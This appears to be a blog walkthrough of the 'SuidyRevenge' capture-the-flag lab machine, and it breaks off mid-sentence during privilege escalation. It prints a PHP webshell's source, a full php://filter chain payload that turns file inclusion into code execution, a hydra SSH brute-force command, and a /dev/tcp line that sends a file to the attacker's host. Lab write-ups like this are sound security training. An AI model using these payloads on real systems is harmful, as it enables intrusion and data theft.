{"id":582,"date":"2024-04-18T18:46:47","date_gmt":"2024-04-18T10:46:47","guid":{"rendered":"http:\/\/162.14.82.114\/?p=582"},"modified":"2024-04-18T18:48:42","modified_gmt":"2024-04-18T10:48:42","slug":"hmv-_-suidyrevenge","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/582\/04\/18\/2024\/","title":{"rendered":"hmv[-_-]SuidyRevenge"},"content":{"rendered":"<h1>SuidyRevenge<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846304.png\" alt=\"image-20240418162222333\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846305.png\" alt=\"image-20240418163526214\" \/><\/p>\n<h2>Information gathering<\/h2>\n<h3>Port scan<\/h3>\n<pre><code class=\"language-bash\">rustscan -a 192.168.0.140 -- -A\n\nOpen 192.168.0.140:22\nOpen 192.168.0.140:80\n\nPORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 99:04:21:6d:81:68:2e:d7:fe:5e:b2:2c:1c:a2:f5:3d (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDAG\/AX+0fiqIOG\/5Jb4HuzPcAIdWkKC9AY7R9eqeSvykjKD3T3cVL5rbWGz3vfkBBDqVAp6l6Fj3CGsS6h4jKrnObsoDxtfIMAgspLQF9b9KjMEcM0aLDQKusQI5H9C5\/HMsC50qx7XZUeOoTDinNR4wFjBls2PcbY8IJoRtapRYxvkRHc4l+eSpZk8+NJ2Z0xGYljlCwketld9+9BZuKEBThRvms+5ZQ8AQntoG7mD2JgeIIHr5vxU62ECM5V1EWhAnW8KEI3otZKAOpU48p3r+pWpAeGJJapWAx8f+IPzDWpR7BwosImvRvUgXgqqvPwkqCL9t8HJrieWcIrm1a1\n|   256 b2:4e:c2:91:2a:ba:eb:9c:b7:26:69:08:a2:de:f2:f1 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGWoTM7aAsBYvrYZYL4vz9sEaD+Pf0pYs61DwxR0zyK8de0rg+OoAnDz217AhoO78rRAqAdrE6382xpHKcmrm8I=\n|   256 66:4e:78:52:b1:2d:b6:9a:8b:56:2b:ca:e5:48:55:2d (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII4uRBZ1dmmy2uld4YwTO9LQeMWjp7nsQLNZXsg+nBfl\n80\/tcp open  http    syn-ack nginx 1.14.2\n| http-methods: \n|_  Supported Methods: GET HEAD\n|_http-title: Site doesn&#039;t have a title (text\/html).\n|_http-server-header: nginx\/1.14.2\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<p>Only two services: OpenSSH 7.9p1 on Debian 10 and nginx 1.14.2.<\/p>\n<h3>Directory scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/SuidyRevenge]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.140 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,git,jpg,txt,png\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.140\n[+] 
Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,png,php,zip,bak,git,jpg\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\nProgress: 581664 \/ 1764488 (32.97%)^C\n[!] Keyboard interrupt detected, terminating.\nProgress: 586627 \/ 1764488 (33.25%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>Nothing turned up in the first third of the wordlist; the interesting path comes from the page source instead.<\/p>\n<h2>Vulnerability discovery<\/h2>\n<h3>Footprinting<\/h3>\n<p>The front page carries an HTML comment that names both the directory and the file type of the backdoors:<\/p>\n<pre><code class=\"language-html\">Im proud to announce that &quot;theuser&quot; is not anymore in our servers. Our admin &quot;mudra&quot; is the best admin of the world. 
-suidy\n&lt;!--\n\n&quot;mudra&quot; is not the best admin, IM IN!!!!\nHe only changed my password to a different but I had time\nto put 2 backdoors (.php) from my KALI into \/supersecure to keep the access!\n\n-theuser\n\n--&gt;<\/code><\/pre>\n<h3>Information gathering<\/h3>\n<p>&quot;From my KALI&quot; suggests stock files, so start from the webshells Kali ships with:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/SuidyRevenge]\n\u2514\u2500$ ls \/usr\/share\/webshells\/php\nfindsocket  php-backdoor.php  php-reverse-shell.php  qsd-php-backdoor.php  simple-backdoor.php<\/code><\/pre>\n<p>Requesting each of those names under <code>\/supersecure<\/code>, only the last one responds:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.140\/supersecure\/simple-backdoor.php?cmd=whoami<\/code><\/pre>\n<pre><code class=\"language-text\">cmd parameter is my friend.\nwww-data<\/code><\/pre>\n<p>A reverse shell through it failed. The stock script passes <code>cmd<\/code> straight to <code>system()<\/code> and prints no &quot;cmd parameter is my friend.&quot; banner, so the copy on the target is not the stock file:<\/p>\n<pre><code class=\"language-php\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/SuidyRevenge]\n\u2514\u2500$ cat \/usr\/share\/webshells\/php\/simple-backdoor.php       \n&lt;!-- Simple PHP backdoor by DK (http:\/\/michaeldaw.org) --&gt;\n\n&lt;?php\n\nif(isset($_REQUEST[&#039;cmd&#039;])){\n        echo &quot;&lt;pre&gt;&quot;;\n        $cmd = ($_REQUEST[&#039;cmd&#039;]);\n        system($cmd);\n        echo &quot;&lt;\/pre&gt;&quot;;\n        die;\n}\n\n?&gt;\n\nUsage: http:\/\/target.com\/simple-backdoor.php?cmd=cat+\/etc\/passwd\n\n&lt;!--    http:\/\/michaeldaw.org   2006    --&gt;<\/code><\/pre>\n<p>Single-word commands still work, so collect what they give:<\/p>\n<pre><code class=\"language-text\">http:\/\/192.168.0.140\/supersecure\/simple-backdoor.php?cmd=pwd<\/code><\/pre>\n<pre><code 
class=\"language-text\">\/var\/www\/html\/supersecure<\/code><\/pre>\n<p>Then list the files in that directory:<\/p>\n<pre><code class=\"language-text\">http:\/\/192.168.0.140\/supersecure\/simple-backdoor.php?cmd=ls<\/code><\/pre>\n<pre><code class=\"language-text\">mysuperbackdoor.php\nsimple-backdoor.php<\/code><\/pre>\n<p><code>simple-backdoor.php<\/code> only lets letters and digits through: spaces, slashes and everything else are dropped whatever encoding is tried (the source dumped further down confirms it). So turn to the other file. <code>mysuperbackdoor.php<\/code> takes a <code>file<\/code> parameter; wrapping the target in <code>php:\/\/filter<\/code> with a base64 encoder makes the include return the file&#039;s source instead of executing it:<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.140\/supersecure\/mysuperbackdoor.php?file=php:\/\/filter\/read=convert.base64-encode\/resource=mysuperbackdoor.php<\/code><\/pre>\n<pre><code class=\"language-php\">ZmlsZSBwYXJhbWV0ZXIgaXMgbXkgZnJpZW5kLgo8P3BocAppbmNsdWRlICRfUkVRVUVTVFsnZmlsZSddOwo\/Pgo=\nfile parameter is my friend.\n&lt;?php\ninclude $_REQUEST[&#039;file&#039;];\n?&gt;<\/code><\/pre>\n<p>The first line is the raw response, the rest is its decoding: a bare <code>include $_REQUEST[&#039;file&#039;]<\/code>, an unrestricted file inclusion. The same request against <code>simple-backdoor.php<\/code> explains the failed reverse shell: a <code>preg_replace<\/code> strips every non-alphanumeric character before <code>system()<\/code> runs.<\/p>\n<pre><code class=\"language-bash\">http:\/\/192.168.0.140\/supersecure\/mysuperbackdoor.php?file=php:\/\/filter\/read=convert.base64-encode\/resource=simple-backdoor.php<\/code><\/pre>\n<pre><code class=\"language-php\">Y21kIHBhcmFtZXRlciBpcyBteSBmcmllbmQuCjw\/cGhwCgppZihpc3NldCgkX1JFUVVFU1RbJ2NtZCddKSl7CiAgICAgICAgZWNobyAiPHByZT4iOwogICAgICAgICRjbWQgPSAoJF9SRVFVRVNUWydjbWQnXSk7CiAgICAgICAgJHJlc3VsdCA9IHByZWdfcmVwbGFjZSgiL1teYS16QS1aMC05XSsvIiwgIiIsICRjbWQpOwogICAgICAgIHN5c3RlbSgkcmVzdWx0KTsKICAgICAgICBlY2hvICI8L3ByZT4iOwogICAgICAgIGRpZTsKfQoKPz4K\ncmd parameter is my friend.\n&lt;?php\n\nif(isset($_REQUEST[&#039;cmd&#039;])){\n        echo &quot;&lt;pre&gt;&quot;;\n        $cmd = ($_REQUEST[&#039;cmd&#039;]);\n        $result = preg_replace(&quot;\/[^a-zA-Z0-9]+\/&quot;, &quot;&quot;, $cmd);\n        system($result);\n        echo &quot;&lt;\/pre&gt;&quot;;\n        
die;\n}\n\n?&gt;<\/code><\/pre>\n<p>With an unrestricted <code>include<\/code> no upload is needed: a chain of <code>convert.iconv<\/code> and base64 filters turns the empty <code>php:\/\/temp<\/code> resource into arbitrary bytes, which <code>include<\/code> then executes as PHP. php_filter_chain_generator builds a chain that expands to <code>&lt;?=`$_GET[0]` ?&gt;<\/code>, so the command travels in parameter <code>0<\/code> with no restriction on its characters:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/php_filter_chain_generator]\n\u2514\u2500$ python3 php_filter_chain_generator.py --chain &#039;&lt;?=`$_GET[0]` ?&gt;&#039;\n[+] The following gadget chain will generate the following code : &lt;?=`$_GET[0]` ?&gt; (base64 value: PD89YCRfR0VUWzBdYCA\/Pg)\nphp:\/\/filter\/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM869.UTF16|convert.iconv.L3.CSISO90|convert.iconv.UCS2.UTF-8|convert.iconv.CSISOLATIN6.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|
convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.iconv.UHC.CP1361|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode\/resource=php:\/\/temp<\/code><\/pre>\n<p>Pass the whole chain as the <code>file<\/code> parameter and put the command in <code>0<\/code>. The screenshots show the result; the <code>(remote)<\/code> prompt in the next section is the shell obtained this way.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846307.png\" alt=\"image-20240418172136190\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846308.png\" alt=\"image-20240418172146120\" \/><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Information gathering<\/h3>\n<p>Start with the SUID files. Two of them are not stock Debian binaries, <code>\/home\/suidy\/suidyyyyy<\/code> and <code>\/usr\/bin\/violent<\/code>; only the first matters for this path.<\/p>\n<pre><code class=\"language-bash\">(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/home\/suidy\/suidyyyyy\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/bin\/umount\n\/usr\/bin\/sudo\n\/usr\/bin\/chsh\n\/usr\/bin\/mount\n\/usr\/bin\/violent\n\/usr\/bin\/newgrp\n\/usr\/bin\/chfn\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/passwd\n(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ file \/home\/suidy\/suidyyyyy\n\/home\/suidy\/suidyyyyy: setuid, setgid regular file, no read permission\n(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ ls -la\ntotal 16\ndrwxr-xr-x 2 root     root 4096 Oct  1  2020 .\ndrwxr-xr-x 3 root     root 4096 Oct  1  2020 ..\n-rw-r--r-- 1 www-data root   65 Oct  1  2020 mysuperbackdoor.php\n-rw-r--r-- 1 www-data root  249 Oct  1  2020 simple-backdoor.php\n(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ cd ..;ls -la\ntotal 20\ndrwxr-xr-x 3 root     root     4096 Oct  1  2020 .\ndrwxr-xr-x 3 root     root     4096 Oct  1  2020 ..\n-rw-r--r-- 1 root     root      322 Oct  1  2020 index.html\n-rw-r--r-- 1 www-data www-data   79 Oct  1  2020 murdanote.txt\ndrwxr-xr-x 2 root     root     4096 Oct  1  2020 supersecure\n(remote) www-data@suidyrevenge:\/var\/www\/html$ cat murdanote.txt \nI always lost my password so Im using \none password from rockyou.txt !\n\n-murda\n(remote) www-data@suidyrevenge:\/var\/www\/html\/supersecure$ cd \/home\/suidy\/\n(remote) www-data@suidyrevenge:\/home\/suidy$ .\/suidyyyyy\nbash: .\/suidyyyyy: Permission denied\n(remote) www-data@suidyrevenge:\/home\/suidy$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power com<br>es great responsibility.\n\n[sudo] password for www-data: \n(remote) www-data@suidyrevenge:\/home\/suidy$ ls -la\ntotal 52\ndrwxrwxr-x 3 suidy suidy    4096 Oct  2  2020 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwsrws--- 1 root  theuser 16712 Oct  2  2020 suidyyyyy\n(remote) www-data@suidyrevenge:\/home\/suidy$ <\/code><\/pre>\n<p>Two things fall out of this. <code>suidyyyyy<\/code> is root-owned with both set-id bits, but it is mode 770 with group <code>theuser<\/code>, so only that group can run it (hence the &quot;Permission denied&quot; as www-data). And <code>murdanote.txt<\/code> says murda&#039;s password is in rockyou.txt. So: murda first, then theuser.<\/p>\n<h3>Brute-forcing murda&#039;s SSH password<\/h3>\n<pre><code class=\"language-bash\">hydra -l murda -P \/usr\/share\/wordlists\/rockyou.txt ssh:\/\/192.168.0.140 -t 64<\/code><\/pre>\n<p>One caveat: hydra itself warns that most SSH servers limit parallel connections and recommends <code>-t 4<\/code>; with <code>-t 64<\/code> the server may drop attempts and the right password can be skipped.<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404181846309.png\" alt=\"image-20240418172949704\" \/><\/p>\n<h3>Looking around as murda<\/h3>\n<pre><code class=\"language-bash\">murda@suidyrevenge:\/var\/www\/html$ cd \/home\/murda\/\nmurda@suidyrevenge:~$ ls -la\ntotal 36\ndrwxrwxr-- 3 murda murda 4096 Oct  
1  2020 .\ndrwxr-xr-x 8 root  root  4096 Oct  1  2020 ..\n-rw------- 1 murda murda   25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 murda murda  220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 murda murda 3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 murda murda 4096 Oct  1  2020 .local\n-rwxrwx--- 1 murda murda  807 Oct  1  2020 .profile\n-rwxrwx--- 1 murda murda  178 Oct  1  2020 secret.txt\n-rwxrwx--- 1 murda murda   58 Oct  1  2020 .Xauthority\nmurda@suidyrevenge:~$ cat secret.txt \nI know that theuser is here!\nI just got the id_rsa from &quot;violent&quot;.\nI will put the key in a secure place for theuser!\nI hope he find it.\nRemember that rockyou.txt is your friend!\nmurda@suidyrevenge:~$ cat .bash_history \nrm ~\/.bash_history \nexit\nmurda@suidyrevenge:~$ cd ..\nmurda@suidyrevenge:\/home$ ls -la\ntotal 32\ndrwxr-xr-x  8 root    root    4096 Oct  1  2020 .\ndrwxr-xr-x 18 root    root    4096 Oct  1  2020 ..\ndrwxrwxr--  3 murda   murda   4096 Oct  1  2020 murda\ndrwxrwx---  2 ruin    ruin    4096 Oct  1  2020 ruin\ndrwxrwxr-x  3 suidy   suidy   4096 Oct  2  2020 suidy\ndrwxrwx---  3 theuser theuser 4096 Oct  2  2020 theuser\ndrwxrwx---  3 violent violent 4096 Oct  1  2020 violent\ndrwxrwx---  2 yo      yo      4096 Oct  1  2020 yo\nmurda@suidyrevenge:\/home$ cat 
\/etc\/passwd\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nmurda:x:1000:1000:murda,,,:\/home\/murda:\/bin\/bash\nsystemd-coredump:x:999:999:systemd Core 
Dumper:\/:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nviolent:x:1001:1001:,,,:\/home\/violent:\/bin\/bash\nyo:x:1002:1002:,,,:\/home\/yo:\/bin\/bash\nruin:x:1003:1003:,,,:\/home\/ruin:\/bin\/bash\ntheuser:x:1004:1004:,,,:\/home\/theuser:\/bin\/bash\nsuidy:x:1005:1005:,,,:\/home\/suidy:\/bin\/bash<\/code><\/pre>\n<h3>Getting theuser<\/h3>\n<p>That is a lot of users....<\/p>\n<p>Brute-forcing <code>theuser<\/code> went nowhere, so I tried the words from the web page instead. The comment said mudra &quot;changed my password to a different&quot;, and the password is literally <code>different<\/code>:<\/p>\n<pre><code class=\"language-bash\">murda@suidyrevenge:\/home$ su theuser\nPassword: \ntheuser@suidyrevenge:\/home$ cd theuser\/\ntheuser@suidyrevenge:~$ ls -la\ntotal 32\ndrwxrwx--- 3 theuser theuser 4096 Oct  2  2020 .\ndrwxr-xr-x 8 root    root    4096 Oct  1  2020 ..\n-rw------- 1 theuser theuser   33 Oct  2  2020 .bash_history\n-rwxrwx--- 1 theuser theuser  220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 theuser theuser 3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 theuser theuser 4096 Oct  1  2020 .local\n-rwxrwx--- 1 theuser theuser  807 Oct  1  2020 .profile\n-rw-r----- 1 theuser theuser 1961 Oct  2  2020 user.txt\ntheuser@suidyrevenge:~$ cat user.txt \n\n                                   .     **                                     \n                                *           *.                                  
\n                                              ,*                                \n                                                 *,                             \n                         ,                         ,*                           \n                      .,                              *,                        \n                    \/                                    *                      \n                 ,*                                        *,                   \n               \/.                                            .*.                \n             *                                                  **              \n             ,*                                               ,*                \n                **                                          *.                  \n                   **                                    **.                    \n                     ,*                                **                       \n                        *,                          ,*                          \n                           *                      **                            \n                             *,                .*                               \n                                *.           **                                 \n                                  **      ,*,                                   \n                                     ** *,                                      \n\nHMVbisoususeryay\ntheuser@suidyrevenge:~$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for theuser: \nSorry, user theuser may not run sudo on suidyrevenge.\ntheuser@suidyrevenge:~$ cat \/etc\/cron*\ncat: \/etc\/cron.d: Is a directory\ncat: \/etc\/cron.daily: Is a directory\ncat: \/etc\/cron.hourly: Is a directory\ncat: \/etc\/cron.monthly: Is a directory\n# \/etc\/crontab: system-wide crontab\n# Unlike any other crontab you don&#039;t have to run the `crontab&#039;\n# command to install the new version when you edit this file\n# and files in \/etc\/cron.d. These files also have username fields,\n# that none of the other crontabs do.\n\nSHELL=\/bin\/sh\nPATH=\/usr\/local\/sbin:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin\n\n# Example of job definition:\n# .---------------- minute (0 - 59)\n# |  .------------- hour (0 - 23)\n# |  |  .---------- day of month (1 - 31)\n# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...\n# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat\n# |  |  |  |  |\n# *  *  *  *  * user-name command to be executed\n17 *    * * *   root    cd \/ &amp;&amp; run-parts --report \/etc\/cron.hourly\n25 6    * * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.daily )\n47 6    * * 7   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.weekly )\n52 6    1 * *   root    test -x \/usr\/sbin\/anacron || ( cd \/ &amp;&amp; run-parts --report \/etc\/cron.monthly )\n#\ncat: \/etc\/cron.weekly: Is a directory\ntheuser@suidyrevenge:~$ cd ..\/suidy\/\ntheuser@suidyrevenge:\/home\/suidy$ ls -la\ntotal 52\ndrwxrwxr-x 3 suidy suidy    4096 Oct  2  2020 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 
.bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsrws--- 1 root  theuser 16712 Oct  2  2020 suidyyyyy\ntheuser@suidyrevenge:\/home\/suidy$ .\/suidyyyyy \nsuidy@suidyrevenge:\/home\/suidy$ whoami;id\nsuidy\nuid=1005(suidy) gid=1004(theuser) groups=1004(theuser)<\/code><\/pre>\n<h3>Going for root<\/h3>\n<p>Running the SUID binary as theuser gives a shell as <code>suidy<\/code> (uid 1005), not root. That shell is still useful: <code>note.txt<\/code> is readable only by suidy, and it explains what now protects the binary:<\/p>\n<pre><code class=\"language-bash\">suidy@suidyrevenge:\/home\/suidy$ ls -la\ntotal 52\ndrwxrwxr-x 3 suidy suidy    4096 Oct  2  2020 .\ndrwxr-xr-x 8 root  root     4096 Oct  1  2020 ..\n-rw------- 1 suidy suidy      25 Oct  1  2020 .bash_history\n-rwxrwx--- 1 suidy suidy     220 Oct  1  2020 .bash_logout\n-rwxrwx--- 1 suidy suidy    3526 Oct  1  2020 .bashrc\ndrwxr-xr-x 3 suidy suidy    4096 Oct  1  2020 .local\n-rw-r----- 1 suidy suidy     262 Oct  1  2020 note.txt\n-rwxrwx--- 1 suidy suidy     807 Oct  1  2020 .profile\n-rwsrws--- 1 root  theuser 16712 Oct  2  2020 suidyyyyy\nsuidy@suidyrevenge:\/home\/suidy$ cat note.txt \nI know that theuser is not here anymore but suidyyyyy is now more secure!\nroot runs the script as in the past that always gives SUID to suidyyyyy binary\nbut this time also check the size of the file.\nWE DONT WANT MORE &quot;theuser&quot; HERE!.\nWE ARE SECURE NOW.\n\n-suidy\nsuidy@suidyrevenge:\/home\/suidy$ sudo -l\n\nWe trust you have received the usual lecture from the local System\nAdministrator. 
It usually boils down to these three things:\n\n    #1) Respect the privacy of others.\n    #2) Think before you type.\n    #3) With great power comes great responsibility.\n\n[sudo] password for suidy:<\/code><\/pre>\n<p>Pull <code>suidyyyyy<\/code> back to the attacking machine for a look. Start the listener on Kali first, then push the file from the target through bash&#039;s <code>\/dev\/tcp<\/code>:<\/p>\n<pre><code class=\"language-bash\"># on Kali (192.168.0.143), first\nnc -lp 8888 &gt; suidyyyyy\n# on the target\ncat suidyyyyy &gt; \/dev\/tcp\/192.168.0.143\/8888<\/code><\/pre>\n<p>Decompiled in IDA:<\/p>\n<pre><code class=\"language-c\">int __cdecl main(int argc, const char **argv, const char **envp)\n{\n  setuid(0x3EDu);\n  setgid(0x3EDu);\n  system(&quot;\/bin\/bash&quot;);\n  return 0;\n}<\/code><\/pre>\n<p>0x3ED is 1005, suidy&#039;s uid, so the binary only ever hands out a suidy shell. Note the order, too: <code>setuid()<\/code> runs first, so by the time <code>setgid()<\/code> is called the process has already dropped root and that call fails with EPERM (the return value is not checked), which is why <code>id<\/code> above reported gid=1004(theuser) rather than 1005.<\/p>\n<p>The file is mode 770, owned by root but writable by group theuser, so it can be overwritten in place. The note says the size is checked, so the replacement must be exactly <code>16712<\/code> bytes. First attempt, compiled on 